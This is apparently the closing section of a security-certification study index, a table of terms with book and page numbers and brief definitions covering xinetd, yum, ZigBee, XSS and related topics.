wuau.adm template                       5    64   imported from the WSUS server into a GPO
X.509 extensions                        4   124   to distinguish between certificates issued for a browser and for a server
XCACLS.exe                              5    90   modify NTFS permissions for win2000/xp/2003
xferlog                                 6   140   /var/log/xferlog, ftp logs
x-force                                 3   250   a division @ ibm iss, responsible for staying on top of security research and vulnerability detection.
xinetd                                  6    77   eXtended InterNET service daemon, more security features than inetd, & replaces it
xinetd                                  6    77   (performs access control, helps prevent DoS attacks, logs all snort info, binds an IP address to a service) & can start services that are not listed in /etc/services
xinetd                                  6   106   config file in /etc/xinetd.conf and /etc/xinetd.d
xinetd                                  6   109   built-in control mechanism like TCP Wrapper ACLs, more logging options, built-in support for warning banners, resource thresholds, redirects the service to services on other ports or other systems
xinetd access control                   6   77    can be done by IP, domain, hostname, time of access
xinetd network filter                   6   78    admin can bind a specific service to a specific IP
xinetd prevent DOS                      6   77    limits the number of connections any host can make and how many incoming requests will be answered at a time; kills the service if limits are exceeded, so it protects against DoS and port scans
XML report - SCW                      5   197
XOR function                          4    14
XSS                                     2   265   poor input validation, includes JavaScript, inline frames, steals cookies, affects HTTPS and HTTP
xss filter                              5   187   examines the flow of data back and forth between web server and browser, detects XSS
yum                                     6   166   GUI tools use rpm to install, upgrade, remove packages (Red Hat & Fedora)
yum check-update                        6   165   gives a list of what needs to be updated (looks for patches (aka update software))
yum install pkgname                     6   165   to install a package with yum
yum update                              6   165   downloads the updates and installs them (may take a lot of bandwidth and time)
Zero-sum game                         2   202
Zhu's RainbowCrack                      2   134   tool: generates rainbow tables
Zhu's RainbowCrack                      2   136   tool: generates rainbow tables
ZigBee - wireless                       4   158   based on 802.15.4 specs, low cost, cable-replacement tech
ZigBee - long battery life              4   159   ZigBee accommodates long battery life by limiting the amount of time the radio is used; the system remains inactive until receiving a command to enable the light.
ZigBee - security                       4   161   encryption based on AES-CCM (AES Cipher Block Chaining Message Authentication Code (CBC-MAC))
ZigBee - security                       4   161   provides security over: MAC (layer 2), network (layer 3), application (layer 7); however the same key is used over the three layers; selection of the key is done at installation time by: manufacturer, installer, or end user
ZigBee - specification                  4   159   range: 10 m - 75 m; rate = [ 250 kb/s @ 2.4 GHz, 40 kb/s @ 915 MHz, 20 kb/s @ 868 MHz ]; freq = 868 MHz, 915 MHz, 2.4 GHz (DSSS); low power consumption
zpha (Zero Power High Availability)     3   242   zero power high availability for NIPS; will re-route network traffic when the IPS device loses power

				
DOCUMENT INFO
posted:10/3/2011
language:English
pages:202